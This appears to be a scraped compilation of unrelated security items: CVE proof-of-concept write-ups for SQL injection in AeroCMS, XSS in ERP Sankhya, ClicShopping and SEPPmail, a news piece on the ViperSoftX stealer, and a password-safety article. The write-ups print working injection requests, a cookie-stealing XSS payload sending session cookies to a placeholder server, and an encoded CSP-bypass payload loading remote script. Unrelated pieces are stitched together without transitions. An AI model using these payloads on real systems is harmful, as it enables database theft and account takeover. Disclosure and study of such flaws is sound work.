AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the edit parameter at \admin\categories.php. This vulnerability allows attackers to access database information.

**AeroCMS-v0.0.1-SQLi update\_categories\_sql\_injection****Step to Reproduct**

Login to admin panel -> Categories -> Edit.The edit parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

1  
2  

    AeroCMS-0.0.1\admin\categories.phpAeroCMS-0.0.1\admin\includes\update_categories.php

The edit parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**POC**

*   Injection Point

1  

    edit=1+OR+(SELECT+4460+FROM(SELECT+COUNT(*),CONCAT(0x7e,(SELECT+(ELT(4460%3d4460,user()))),0x7e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a)

*   Request

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  

    GET /AeroCMS-0.0.1/admin/categories.php?edit=1+OR+(SELECT+4460+FROM(SELECT+COUNT(*),CONCAT(0x7e,(SELECT+(ELT(4460%3d4460,user()))),0x7e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a) HTTP/1.1Host: localhostCache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/AeroCMS-0.0.1/admin/categories.php?edit=1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=fqkp2e6i3ovd3p117cgt28snqfConnection: close

**SQL query statements**

1  

    "SELECT * FROM categories WHERE cat_id = 1 OR (SELECT 4460 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT (ELT(4460=4460,user()))),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"

CVE-2022-45535: AeroCMS-v0.0.1-SQLi update_categories_sql_injection

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the p_id parameter at \post.php. This vulnerability allows attackers to access database information.

Permalink

Cannot retrieve contributors at this time

**Step to Reproduct**

*   The p_id parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

The p\_id parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

p\_id参数通过Get方式传入，未经过滤带入mysql\_query()函数

**SQL query statements**

    "UPDATE posts set post_views_count = post_views_count + 1 WHERE post_id = 1 AND GTID_SUBSET(CONCAT(0x7e,(SELECT (ELT(9647=9647,user()))),0x7e),9647)
    "SELECT * FROM posts WHERE post_id = 1 or if(substr(database(),1,1)='a',1,0) AND post_status = 'published'"
    

**POC**

*   Injection Point

    p_id=1+AND+GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(9647=9647,user()))),0x7e),9647)
    

*   Request

    GET /AeroCMS-0.0.1/post.php?p_id=1+AND+GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(9647=9647,user()))),0x7e),9647) HTTP/1.1
    Host: localhost
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=jq9gpq0retupb1aa74t4jtj243
    Connection: close

CVE-2022-45331: CVE/post_sql_injection.md at master · rdyx0/CVE

AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the id parameter at \admin\post_comments.php. This vulnerability allows attackers to access database information.

Permalink

Cannot retrieve contributors at this time

**post\_comments\_sql\_injection****Step to Reproduct**

Login to admin panel -> Comments.The id parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very malicious purposes.

**Exploit**

Query out the current user

**Vulnerable Code**

    AeroCMS-0.0.1\admin\post_comments.php
    

The id parameter is passed in the GET mode and brought into the mysql\_query() function without filtering

**POC**

*   Injection Point

    id=1+and+(SELECT+4460+FROM(SELECT+COUNT(*),CONCAT(0x7e,(SELECT+(ELT(4460%3d4460,user()))),0x7e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a) 
    

*   Request

    GET /AeroCMS-0.0.1/admin/post_comments.php?id=1+and+(SELECT+4460+FROM(SELECT+COUNT(*),CONCAT(0x7e,(SELECT+(ELT(4460%3d4460,user()))),0x7e,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a) HTTP/1.1
    Host: localhost
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/AeroCMS-0.0.1/admin/categories.php?edit=1
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=fqkp2e6i3ovd3p117cgt28snqf
    Connection: close
    
    
    

**SQL query statements**

    "SELECT * FROM comments WHERE comment_post_id =1 and (SELECT 4460 FROM(SELECT COUNT(*),CONCAT(0x7e,(SELECT (ELT(4460=4460,user()))),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)"

CVE-2022-45536: CVE/post_comments_sql_injection.md at master · rdyx0/CVE

A malicious extension for Chromium-based web browsers has been observed to be distributed via a long-standing Windows information stealer called ViperSoftX.
Czech-based cybersecurity company dubbed the rogue browser add-on VenomSoftX owing to its standalone features that enable it to access website visits, steal credentials and clipboard data, and even swap cryptocurrency addresses via an

A malicious extension for Chromium-based web browsers has been observed to be distributed via a long-standing Windows information stealer called **ViperSoftX**.

Czech-based cybersecurity company dubbed the rogue browser add-on VenomSoftX owing to its standalone features that enable it to access website visits, steal credentials and clipboard data, and even swap cryptocurrency addresses via an adversary-in-the-middle (AiTM) attack.

ViperSoftX, which first came to light in February 2020, was characterized by Fortinet as a JavaScript-based remote access trojan and cryptocurrency stealer. The malware's use of a browser extension to advance its information-gathering goals was documented by Sophos threat analyst Colin Cowie earlier this year.

"This multi-stage stealer exhibits interesting hiding capabilities, concealed as small PowerShell scripts on a single line in the middle of otherwise innocent-looking large log files, among others," Avast researcher Jan Rubín said in a technical write-up.

"ViperSoftX focuses on stealing cryptocurrencies, clipboard swapping, fingerprinting the infected machine, as well as downloading and executing arbitrary additional payloads, or executing commands."

The distribution vector used to propagate ViperSoftX is typically achieved through cracked software for Adobe Illustrator and Microsoft Office that are hosted on file-sharing sites.

The downloaded executable file comes with a clean version of cracked software along with additional files that set up persistence on the host and harbor the ViperSoftX PowerShell script.

Newer variants of the malware are also capable of loading the VenomSoftX add-on, which is retrieved from a remote server, to Chromium-based browsers such as Google Chrome, Microsoft Edge, Opera, Brave, and Vivaldi.

This is achieved by searching for LNK files for the browser applications and modifying the shortcuts with a "\--load-extension" command line switch that points to the path where the unpacked extension is stored.

"The extension tries to disguise itself as well known and common browser extensions such as Google Sheets," Rubín explained. "In reality, the VenomSoftX is yet another information stealer deployed onto the unsuspecting victim with full access permissions to every website the user visits from the infected browser."

It's worth noting that the --load-extension tactic has also been put to use by another browser-based information stealer referred to as ChromeLoader (aka Choziosi Loader or ChromeBack).

VenomSoftX, like ViperSoftX, is also orchestrated to steal cryptocurrencies from its victims. But unlike the latter, which functions as a clipper to reroute fund transfers to an attacker-controlled wallet, VenomSoftX tampers with API requests to crypto exchanges to drain the digital assets.

Services targeted by the extension include Blockchain.com, Binance, Coinbase, Gate.io, and Kucoin.

The development marks a new level of escalation to traditional clipboard swapping, while also not raising any immediate suspicion as the wallet address is replaced at a much more fundamental level.

Avast said it has detected and blocked over 93,000 infections since the start of 2022, with a majority of the impacted users located in India, the U.S., Italy, Brazil, the U.K., Canada, France, Pakistan, and South Africa.

An analysis of the hard-coded wallet addresses in the samples reveals that the operation has netted its authors a sum total of about $130,421 as of November 8, 2022, in various cryptocurrencies. The collective monetary gain has since dropped to $104,500.

"Since the transactions on blockchains/ledgers are inherently irreversible, when the user checks the transaction history of payments afterward, it is already too late," Rubín said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

This Malware Installs Malicious Browser Extensions to Steal Users' Passwords and Cryptos

ERP Sankhya before v4.11b81 was discovered to contain a cross-site scripting (XSS) vulnerability via the component Caixa de Entrada.

\# Exploit Title: ERP Sankhya - XSS to Account Takeover

\# Google Dork: N/A

\# Date: 19/10/2022

\# Exploit Author: Lucas Alves Da Cunha - (0xLucas)

\# Vendor Homepage: https://www.sankhya.com.br

\# Version: Sankhya Om <= 4.13.x

\# Tested on: Sankhya Om 4.11

\# CVE: CVE-2022-42989

\# Descrição:

Um usuário comum no ERP Sankhya pode enviar uma mensagem para qualquer outro usuário do sistema inclusive administradores, através da função "Caixa de Entrada". No corpo da mensagem, podemos injetar códigos html/javascript levando para um cross site scripting.

Payload para verificar existência da vulnerabilidade:

<img src=1 onerror=alert(1)>

Payload utilizado para capturar os dados da sessão do usuário:

<img src=1 onerror=document.location="http://yourserver/?cookie="+document.cookie>

\# Passos para reprodução:

1 - Encontrando a funcionalidade: https://i.imgur.com/B9SWknH.png

2 - Enviando payload para verificar existência da vulnerabilidade: https://i.imgur.com/ZKSkLmx.png

2.1 - Vulnerabilidade comprovada: https://i.imgur.com/1KiAa1m.png

3 - Explorando a vulnerabilidade: https://i.imgur.com/n8Jevum.png

3.1 - Sessão capturada: https://i.imgur.com/aDatjyN.png

Podemos utilizar os dados da sessão capturada e manipular a sessão utilizando a ferramenta: Cookie-Editor do Google Chrome, e assim entraremos na sessão do usuário desejado. Conforme a imagem a seguir: https://i.imgur.com/L10Yf9f.png

\# Impacto:

Explorando essa vulnerabilidade, podemos comprometer qualquer conta de usuário do sistema, desde uma simples conta até mesmo uma conta de administrador do sistema, causando assim um grande impacto de negócio.

CVE-2022-42989: CVEs/SankhyaERP_XSS_Account_Takeover.txt at main · 0xLUC4S/CVEs

ClicShopping version 3.402 suffers from a cross site scripting vulnerability.

    ## Title: ClicShopping_V3-Version3.402 XSS-Reflected## Author: nu11secur1ty## Date: 11.20.2022## Vendor: https://www.clicshopping.org/forum/## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3## Description:The name of an arbitrarily supplied URL parameter is copied into thevalue of an HTML tag attribute which is encapsulated in doublequotation marks.The attacker can trick users to open a very dangerous link or he canget sensitive information, also he can destroy some components of yoursystem.## STATUS: HIGH Vulnerability[+] Payload:```jsGET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1HTTP/1.1Host: pwnedhost.comAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)## Proof and Exploit:[href](https://streamable.com/mgbftx)## Time spent`1:00`

ClicShopping 3.402 Cross Site Scripting

Auth. (subscriber+) Insecure Direct Object References (IDOR) vulnerability in Comments – wpDiscuz plugin 7.4.2 on WordPress.

CVE-2022-43492: Comments – wpDiscuz

The SEPPmail solution is vulnerable to a Cross-Site Scripting vulnerability (XSS), because user input is not correctly encoded in HTML attributes when returned by the server.SEPPmail 11.1.10 allows XSS via a recipient address.

During a penetration test, Pentagrid identified several vulnerabilities in the E-mail gateway SEPPmail version 11.1.10 developed by the Swiss company Seppmail AG. The gateway solution is used to transfer confidential E-mails.

**Timeline**

*   2020-12-14: Vulnerabilities found.
    
*   2021-01-12: Initial contact for coordinated disclosure.
    
*   2021-01-15: Ticket opened.
    
*   2021-02-17: Inquiry about planning and whether there is a need for clarification. According to Seppmail, the issues were already fixed.
    
*   2022-11-17: Advisory updated and published.
    

**Affected Components**

The identified vulnerabilities affect SEPPmail Version 11.1.10. Other versions of the SEPPmail software may be affected as well.

**Technical Details**

**1\. Reflected Cross-Site Scripting (XSS) via subject parameter (CVE-2021-31739)**

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N, **6.1 Medium**

The SEPPmail solution is vulnerable to a Cross-Site Scripting vulnerability (XSS), because user input is not correctly encoded in HTML attributes when returned by the server.

Impact: An attacker can execute arbitrary HTML/JavaScript code in the domain under which SEPPmail runs (for example _securemail.example.org_) in the target's browser and, for example, attempt to retrieve the target's username and password and send them to the attacker.

Details: During the security test it was found that the URL parameter subject is received, but is not correctly encoded and re-embedded in the HTML page. If a target person calls the following URL, the HTML code contained in the URL is subsequently executed:

https://securemail.example.org/web.app?subject=foobar%22%20value=pentagrid%20autofocus%20type=text%20><svg%20src=://example.org/assets/img/svg/svg\_xss.svg%20width=999%20height=999>

The corresponding HTTP request with HTML code in the Parameter subject is:

GET /web.app?subject=foobar%22%20value=pentagrid%20autofocus%20type=text%20><svg%20src=://example.org/assets/img/svg/svg\_xss.svg%20width=999%20height=999> HTTP/1.1
Host: securemail.example.org
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

And the corresponding HTTP response that embeds the HTML code from the request in the response is:

HTTP/1.1 400 ERROR
Date: Mon, 14 Dec 2020 09:47:19 GMT
Cache-control: private, no-cache, no-store
Pragma: no-cache
X-frame-options: DENY
Strict-Transport-Security: max-age=15552000; includeSubDomains
Content-length: 16302
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'; connect-src 'self'; img-src 'self'; style-src 'self' 'unsafe-inline'; object-src 'none';
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Vary: Origin
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: \[…\]; Path=/; Domain=.securemail.example.org; HTTPOnly

\[…\]
         <input type="hidden" name="rcpt" value="" />
         <input type="hidden" name="predefinedsubject" value="foobar" value=pentagrid autofocus type=text ><svg src=://example.org /assets/img/svg/svg\_xss.svg width=999 height=999>" />
         <div class="panel panel-default" style="margin-bottom:10px;">
             <div class="panel-body">
                 <div class="form-horizontal"
\[…\]

In this case, the SVG image file is embedded as a placeholder in the page, but because of the Content Security Policy used, it is not loaded from the _example.org_ page and thus no JavaScript is executed. However, the Content Security Policy bypass in finding 1.3 is applicable.

Precondition: A target must open the URL created by the attacker. Furthermore, the attacker must also find the Content Security Policy bypass to effectively exploit the problem.

**2\. Cross-Site Scripting vulnerability via recipient address (CVE-2021-31740)**

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N, **6.1 Medium**

For the recipient field in SEPPMail's web frontend, user input is not embedded correctly in the web page and therefore leads to cross-site scripting vulnerabilities (XSS).

Impact: An attacker can execute arbitrary JavaScript code in SEPPmail's domain and, for example, trick a target person into revealing credentials.

Details: If a recipient address with the following content is inserted in the SEPPmail web interface and then an attempt is made to send the e-mail, the JavaScript code contained is executed:

foo@bar<svg/onload='alert(1))'

Basically, this problem would not be exploitable and would represent a so-called Self-XSS, where a user could only attack himself. However, the application allows all parameters to be transferred in the URL, such as the session token. Thus, an attacker can use his own session to log the target in and immediately execute the XSS. However, this URL is then only valid as long as the included session is also valid:

https://securemail.example.org/web.app?session=Ufde\[…\]K&Uf\[…\]K=Uj\[…\]VT&op=send-mail&msgid=1607513954.6024&email=example@example.org&origtrackid=&origmsgid=&submit=yes&newto=foo@bar%3csvg%2fonload%3d%27alert%281%29%27&recipients%5b%5d=&subject=&uploadfile=&messagebody=

If a target person opens the URL, he or she is recognized as a logged-in attacker (because of the session ID passed along) and then the XSS is executed. With XSS, it would be possible for an attacker to display a login form, for example, in order to get the target person to enter login credentials. These could then be forwarded to the attacker.

Precondition: A target person must be tempted to open the attacker-specified URL. The attacker must also have his own access to the SEPPmail installation and be willing to pass on his associated session token to the target. In addition, the attack is time-limited to the validity of the session in the URL.

**3\. Bypassing weak content security policy (CSP)**

CVSS:3.1, **0.0 Information**

In order to make Cross-Site Scripting attacks more difficult, the website uses a Content Security Policy. However, this is not designed to be complete and can be bypassed by an attacker.

Impact: An attacker who finds a Cross-Site Scripting vulnerability on the website can also exploit it.

Details: The CSP is a mechanism to prevent XSS attacks (as in the previously described findings). However, this requires a strict and gap-less design of the CSP. SEPPMail's CSP is visible for every website visitor and has the following rules:

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline'; connect-src 'self'; img-src 'self'; style-src 'self' 'unsafe-inline'; object-src 'none';

The unsafe-inline directive is particularly problematic. Inlined JavaScript is allowed here and thus the CSP supports common Cross-Site Scripting attacks. For example, if an attacker performs a Cross-Site Scripting attack using finding 2, but is unaware of the active SCP, he could use the following HTML code:

foo@bar<svg/src='https://example.org/'

However, since the CSP states default-src self, the browser does not reload images from the _example.org_ page used here. The browser denies access with the following error message:

Refused to load the image 'https://example.org/' because it violates the following Content Security Policy directive: "img-src 'self'".

A similar error would occur if an attempt was made to load a JavaScript file from _example.org_.

However, it is problematic that the script source unsafe-inline is allowed to be used, i.e. the following XSS attack works because an embedded JavaScript code is included:

foo@bar<svg/onload='alert(1))'

Therefore, an attacker basically has the possibility to execute JavaScript. This can be exploited further to indirectly load and execute JavaScript from _example.org_. Usually there are always web pages on the used domain _securemail.example.org_ that do not return HTTP header Content-Security-Policy, for example error pages like on the URL https://securemail.example.org/a that returns an unprotected error page:

HTTP/1.1 404 Not Found
Date: Wed, 09 Dec 2020 12:22:05 GMT
Strict-Transport-Security: max-age=15552000; includeSubDomains
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: \[…\]; Path=/; Domain=securemail.example.org; HTTPOnly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>

This can be used to load this error page in a separate IFrame:

foo@bar<svg/onload='frame=document.createElement("iframe");frame.src="/a";document.body.appendChild(frame);'

Afterwards, a new JavaScript element can be created, which is then loaded into the IFrame. Since no CSP applies to the IFrame (since the HTTP header is not returned on the IFrame URL), any JavaScript code can be loaded there, even from _example.org_:

foo@bar<svg/onload='frame=document.createElement("iframe");frame.src="/a";document.body.appendChild(frame);setTimeout(function(){script=document.createElement("script");script.src="//example.org/a.js";window.frames\[0\].document.head.appendChild(script);},3000);'

However, since in the payload used will be converted to lowercase, the JavaScript code must still be encoded. This results in the following attack code:

https://securemail.example.org/web.app?session=0H\[…\]E=z\[…\]I&op=send-mail&msgid=1607527930.5970&email=example@example.org&origtrackid=&origmsgid=&submit=yes&recipients\[\]=&subject=&uploadfile=&messagebody=&newto=foo@bar%3Csvg/onload=%27%26%230000102%26%230000114%26%230000097%26%230000109%26%230000101%26%230000061%26%230000100%26%230000111%26%230000099%26%230000117%26%230000109%26%230000101%26%230000110%26%230000116%26%230000046%26%230000099%26%230000114%26%230000101%26%230000097%26%230000116%26%230000101%26%230000069%26%230000108%26%230000101%26%230000109%26%230000101%26%230000110%26%230000116%26%230000040%26%230000034%26%230000105%26%230000102%26%230000114%26%230000097%26%230000109%26%230000101%26%230000034%26%230000041%26%230000059%26%230000102%26%230000114%26%230000097%26%230000109%26%230000101%26%230000046%26%230000115%26%230000114%26%230000099%26%230000061%26%230000034%26%230000047%26%230000118%26%230000049%26%230000047%26%230000034%26%230000059%26%230000100%26%230000111%26%230000099%26%230000117%26%230000109%26%230000101%26%230000110%26%230000116%26%230000046%26%230000098%26%230000111%26%230000100%26%230000121%26%230000046%26%230000097%26%230000112%26%230000112%26%230000101%26%230000110%26%230000100%26%230000067%26%230000104%26%230000105%26%230000108%26%230000100%26%230000040%26%230000102%26%230000114%26%230000097%26%230000109%26%230000101%26%230000041%26%230000059%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000061%26%230000100%26%230000111%26%230000099%26%230000117%26%230000109%26%230000101%26%230000110%26%230000116%26%230000046%26%230000099%26%230000114%26%230000101%26%230000097%26%230000116%26%230000101%26%230000069%26%230000108%26%230000101%26%230000109%26%230000101%26%230000110%26%230000116%26%230000040%26%230000034%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000034%26%230000041%26%230000059%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000034%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000032%26%230000099%26%230000114%26%230000101%26%230000097%26%230000116%26%230000101%26%230000100%26%230000034%26%230000041%26%230000059%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000046%26%230000115%26%230000114%26%230000099%26%230000061%26%230000034%26%230000047%26%230000047%26%230000101%26%230000120%26%230000097%26%230000109%26%230000112%26%230000108%26%230000101%26%230000046%26%230000111%26%230000114%26%230000103%26%230000047%26%230000053%26%230000046%26%230000106%26%230000115%26%230000034%26%230000059%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000034%26%230000115%26%230000114%26%230000099%26%230000032%26%230000115%26%230000112%26%230000101%26%230000099%26%230000105%26%230000102%26%230000105%26%230000101%26%230000100%26%230000034%26%230000041%26%230000059%26%230000119%26%230000105%26%230000110%26%230000100%26%230000111%26%230000119%26%230000046%26%230000102%26%230000114%26%230000097%26%230000109%26%230000101%26%230000115%26%230000091%26%230000048%26%230000093%26%230000046%26%230000100%26%230000111%26%230000099%26%230000117%26%230000109%26%230000101%26%230000110%26%230000116%26%230000046%26%230000104%26%230000101%26%230000097%26%230000100%26%230000046%26%230000097%26%230000112%26%230000112%26%230000101%26%230000110%26%230000100%26%230000067%26%230000104%26%230000105%26%230000108%26%230000100%26%230000040%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000041%26%230000059%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000034%26%230000097%26%230000112%26%230000112%26%230000101%26%230000110%26%230000100%26%230000101%26%230000100%26%230000034%26%230000041%26%230000059%27

An attacker can then deliver arbitrary JavaScript code in the JavaScript file on _example.org_. The attacker also has the possibility to perform the attack covertly in the background without IFrames or similar elements being visible.

Precondition: An attacker must first find an exploitable Cross-Site Scripting vulnerability. In addition, user interaction is required for the attack to be carried out, which may involve a visit to one of the attacker's websites or, for example, an advertisement displayed on a third-party website.

**4\. Vulnerable version of the jQuery JavaScript library**

CVSS:3.1, **0.0 Information**

The SEPPmail appliance uses a version of a JavaScript library that has known vulnerabilities.

Impact: If an attacker finds a place where the vulnerability can be exploited, it results in a Cross-Site Scripting attack on the website.

Details: The JavaScript library jQuery, which is used on the SEPPmail appliance website, is available at the following URL:

https://securemail.example.org/js/jquery-3.4.1.min.js

Version 3.5 resolves a potential cross-site scripting issue, as described in the corresponding release notes.

Precondition: An attacker must first find a place where jQuery is used in an exploitable form.

**5\. Reachable registration form and enumeration of already registered e-mail addresses**

CVSS:3.1, **0.0 Information**

Although the functionality for user self-registration has been disabled in the SEPPmail installation Pentagrid reviewed, an attacker can register a new user but could not activate it.

Impact: The problem has no effect because the user account cannot be activated in the tested installation. If an attacker succeeds in activating it, he would be able to use the logged-in area of SEPPmail without an account being created for the attacker. An attacker can also try existing e-mail addresses to find out whether they are already registered on the portal.

Details: The SEPPmail instance used had the following setting disabled: _Allow account self-registration in GINA portal without initial mail_. If an attacker requests the following URL, a new account is created for the email contained in the URL:

https://securemail.example.org/web.app?session=&chksum=&op=accountinit&email=example@example.org&seppmailname=&uilang=e&newpw=11111111&newpw2=11111111&question=In+what+town+or+city+was+your+first+full+time+job%3f&question-preset=0&answer=111&telephone=&toconfirm=yes

If an email address is used in the URL which is already registered, an error is returned saying that a new user could not be created. Thus, an attacker can try different email addresses to find out whether a specific email address is already registered in SEPPmail.

If a not yet registered e-mail address is used, the account will be registered again. However, no activation e-mail was subsequently delivered on the system. It is unclear why this is the case, but the e-mail was blocked when it was sent. Whether a user was created internally in the SEPPmail database was not investigated.

Precondition: The attacker can only enumerate e-mail addresses that have already been registered. Further attacks would require additional vulnerabilities, for example, those that allow an account to be activated.

**Patches and Workaround**

According to Seppmail AG, the vulnerabilities have been addressed since version 12.0.6. Version 12.0.6 was released on 2021-01-27.

CVE-2021-31739: Multiple vulnerabilities in SEPPmail 11.1.10

By Waqas
ExpressVPN’s study on the most common passwords around the world showed that 42% of people use their first name in their passwords, while 43% of them use their birth date.
This is a post from HackRead.com Read the original post: Study shows that 42% of people use their names in passwords

Password theft can make life significantly more difficult. Aside from benign major hassle, compromised passwords can easily lead to identity theft and cause serious legal issues. Therefore, it is worth paying attention to the strength of your passwords and changing them regularly or, at the latest, when you suspect your accounts have been compromised.

ExpressVPN’s study on the most common passwords around the world showed that 42% of people use their first name in their passwords, while 43% of them use their birth date. Since this information is easily traceable on social media, your accounts can be more prone to hacking attacks.

**How can someone find out my password?**

A compromised password allows unauthorized people to log into your accounts. Password compromise is usually not your fault; your data is not directly compromised on a specific computer. There’s no reason to automatically assume that an attacker has accessed or hacked your computer and is still watching it (these thoughts are only appropriate if you find that multiple passwords have been compromised in a relatively short period of time).

The most common reason is the theft of user’s personal data from various services. It is also conceivable that attackers could hack and obtain a database of users of a certain service (a so-called “Breach”) and then publish it. The password is then sold on the black market and can in fact be read by anyone. 

**How to protect yourself****Checking for fraudulent use**

You can easily check your password online. Take a look at the publicly available tools that can do this. Most of them work automatically and can send an alert when you enter your email address if they detect a leak or incident (containing your email address or password) as mentioned above.

The best-known monitoring tool is ”have I been pwned”. Here, after entering your email address, you can see which services or providers have been hacked and which user accounts have been compromised. If your account is listed, consider your password hacked and change it urgently. It is clear which one it is by looking at your password, even if it is not naturally displayed.

You can type the password directly into the Pwned Passwords tool (instead of looking for the associated email). The result is a notification of whether the password was part of a data breach and how many times it happened. The database contains over 613 million compromised passwords that have previously been proven to have been stolen.

Other password compromise checking services:

*   F-Secure
*   Firefox Monitor
*   Chrome browser
*   Avast Hack Check
*   Mirkat for Lenovo

**Discover weak and duplicated passwords at the administrator or keychain**

Password compromise detection or password weakness alerts should be available in any decent password manager. We’ve already covered them in our magazine, and you can find the best-known ones in a dedicated password managers section.

On some systems, passwords are stored in keychains that support the features mentioned above; for example, on iOS (iPhone) and macOS, the keychain warns if a password is weak or repeated across multiple services. Since iOS 14 and macOS Big Sur, the keychain can also keep track of compromised passwords. If your saved password has an exclamation mark icon next to it, you should change it right away.

1.  List of 2020’s most used passwords is here and it’s appalling
2.  Revealed: The 200 Most used and Worst Passwords of 2021
3.  Chrome on Android will alert, fix your compromised password
4.  Psst! tool by 1Password lets users share passwords using a link
5.  Nissan source code leaked, it used “admin” as username, password

**Use a password manager**

The average internet user uses so many services and apps that if they had to use unique passwords for each one, they would not be able to remember them. So, if you don’t want to give up security completely and use a single password, we recommend using a password manager.

Password managers may even suggest strong passwords, which is something to consider. Password suggestions are also built into some browsers or password manager plug-ins allow this feature. Artificial intelligence can judge better than the user what is a suitable and strong password.

